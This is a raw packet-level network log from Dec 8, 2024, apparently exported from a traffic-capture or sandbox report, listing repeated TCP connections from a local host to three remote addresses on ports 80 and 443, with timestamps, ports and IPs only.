                                                                                                                                          Dec 8, 2024 18:06:34.169930935 CET4983680192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:34.172524929 CET4983680192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:34.292448044 CET8049836185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:35.143613100 CET44349834172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:35.143702984 CET49834443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:35.144870996 CET49834443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:35.144880056 CET44349834172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:35.145385981 CET44349834172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:35.146557093 CET49834443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:35.146581888 CET49834443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:35.146626949 CET44349834172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:35.513982058 CET8049836185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:35.514043093 CET4983680192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:36.233395100 CET44349834172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:36.233480930 CET44349834172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:36.233553886 CET49834443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:36.233933926 CET49834443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:36.233946085 CET44349834172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:36.233957052 CET49834443192.168.2.4172.67.165.166
                                                                                                                                          Dec 8, 2024 18:06:36.233962059 CET44349834172.67.165.166192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:36.695449114 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:36.695470095 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:36.695525885 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:36.696059942 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:36.696073055 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:37.140955925 CET4983680192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:37.141480923 CET4984680192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:37.266125917 CET8049846185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:37.266144991 CET8049836185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:37.266211033 CET4984680192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:37.266241074 CET4983680192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:37.279103994 CET4984680192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:37.400965929 CET8049846185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:37.916018009 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:37.916093111 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:37.917490005 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:37.917496920 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:37.917742968 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:37.918759108 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:37.963332891 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.603209972 CET8049846185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.603291035 CET4984680192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:38.641364098 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.641437054 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.641473055 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.641479969 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:38.641494989 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.641535997 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:38.641542912 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.649876118 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.649921894 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:38.649930000 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.658307076 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.658346891 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:38.658354044 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.666765928 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.666811943 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:38.666819096 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.723099947 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:38.762453079 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.811882019 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:38.811889887 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.837390900 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.837443113 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:38.837450027 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.845180035 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.845252037 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:38.845257998 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.852968931 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.853017092 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:38.853023052 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.860790014 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.860863924 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:38.860865116 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.860913992 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:38.861002922 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:38.861011028 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:38.861027002 CET49845443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:38.861031055 CET44349845104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:40.202369928 CET4984680192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:40.206496954 CET4985380192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:40.326029062 CET8049846185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:40.326082945 CET4984680192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:40.329242945 CET8049853185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:40.329303980 CET4985380192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:40.330385923 CET4985380192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:40.449593067 CET8049853185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:40.703531981 CET49855443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:40.703551054 CET44349855104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:40.703610897 CET49855443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:40.718938112 CET49855443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:40.718950987 CET44349855104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:41.708132982 CET8049853185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:41.708239079 CET4985380192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:41.932893038 CET44349855104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:41.933043003 CET49855443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:41.934742928 CET49855443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:41.934748888 CET44349855104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:41.934973001 CET44349855104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:41.978916883 CET49855443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:42.023329973 CET44349855104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:42.354830980 CET49855443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:42.354841948 CET44349855104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:42.367100954 CET44349855104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:42.421262980 CET49855443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:42.997787952 CET44349855104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:42.997870922 CET44349855104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:42.997960091 CET49855443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:43.009646893 CET49855443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:43.021831036 CET49861443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:43.021874905 CET44349861104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:43.021946907 CET49861443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:43.022263050 CET49861443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:43.022274017 CET44349861104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:43.330312014 CET4985380192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:43.330550909 CET4986580192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:43.450155020 CET8049865185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:43.450172901 CET8049853185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:43.450242043 CET4986580192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:43.450269938 CET4985380192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:43.450521946 CET4986580192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:43.576302052 CET8049865185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:44.239950895 CET44349861104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:44.241964102 CET49861443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:44.241987944 CET44349861104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:44.608987093 CET49861443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:44.609009981 CET44349861104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:44.677536011 CET44349861104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:44.719342947 CET49861443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:44.807301998 CET8049865185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:44.807470083 CET4986580192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:45.289565086 CET44349861104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:45.289653063 CET44349861104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:45.290106058 CET49861443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:45.290618896 CET49861443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:45.292696953 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:45.292711973 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:45.293045044 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:45.295456886 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:45.295468092 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:46.312448025 CET4986580192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:46.312725067 CET4987280192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:46.436357021 CET8049872185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:46.436413050 CET4987280192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:46.436527014 CET8049865185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:46.436570883 CET4986580192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:46.436639071 CET4987280192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:46.560580969 CET8049872185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:46.568751097 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:46.571162939 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:46.571178913 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.665796995 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.665851116 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.665885925 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.665923119 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.665955067 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.665970087 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:47.665986061 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.666023016 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:47.666029930 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.678500891 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.678554058 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:47.678561926 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.686851025 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.686912060 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:47.686918974 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.733743906 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:47.783098936 CET8049872185.215.113.43192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.783634901 CET4987280192.168.2.4185.215.113.43
                                                                                                                                          Dec 8, 2024 18:06:47.789515018 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.843126059 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:47.843135118 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.861855030 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.861946106 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.862890005 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:47.862898111 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.862941980 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:47.869652987 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.872786045 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.874927998 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:47.874933958 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.888360977 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.888432026 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.891103983 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:47.891112089 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.894165039 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:47.896167040 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.903966904 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.904064894 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.905721903 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:47.905730009 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.905807972 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:47.911817074 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.919708967 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.919924974 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:47.919931889 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.927846909 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.929605007 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:47.929616928 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.935376883 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.935450077 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:47.935456991 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.948904037 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.948983908 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.951255083 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:47.951263905 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:47.954935074 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:47.961672068 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.015101910 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.050103903 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.053559065 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.055191994 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.055200100 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.067135096 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.067143917 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.067205906 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.067214012 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.078516006 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.078579903 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.078588009 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.078629971 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.082165956 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.082910061 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.090095043 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.090104103 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.090167046 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.098042011 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.098048925 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.098123074 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.102104902 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.102113008 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.102174044 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.110305071 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.110316038 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.110383987 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.118001938 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.118097067 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.122061968 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.122118950 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.130158901 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.130223036 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.137975931 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.138058901 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.141930103 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.142003059 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.243683100 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.243756056 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.245346069 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.245394945 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.252043009 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.252101898 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.258291960 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.258371115 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.264413118 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.264477968 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.267523050 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.267581940 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.273093939 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.273159981 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.276014090 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.276078939 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.281558990 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.281620979 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.287096024 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.287156105 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.292714119 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.292768955 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.295605898 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.295653105 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.301357031 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.301417112 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.306737900 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.306807995 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.309602022 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.309659004 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.313759089 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.313821077 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.319437027 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.319509029 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.324892044 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.324959993 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.330681086 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.330741882 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.333447933 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.333506107 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.339102030 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.339167118 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.344499111 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.344564915 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.435914040 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.435980082 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.439457893 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.439521074 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.443985939 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.444053888 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.448554039 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.448612928 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.450855970 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.450906992 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.455224991 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.455291986 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.465152025 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.465158939 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.465184927 CET44349868104.21.9.168192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:48.465226889 CET49868443192.168.2.4104.21.9.168
                                                                                                                                          Dec 8, 2024 18:06:48.465238094 CET44349868104.21.9.168192.168.2.4
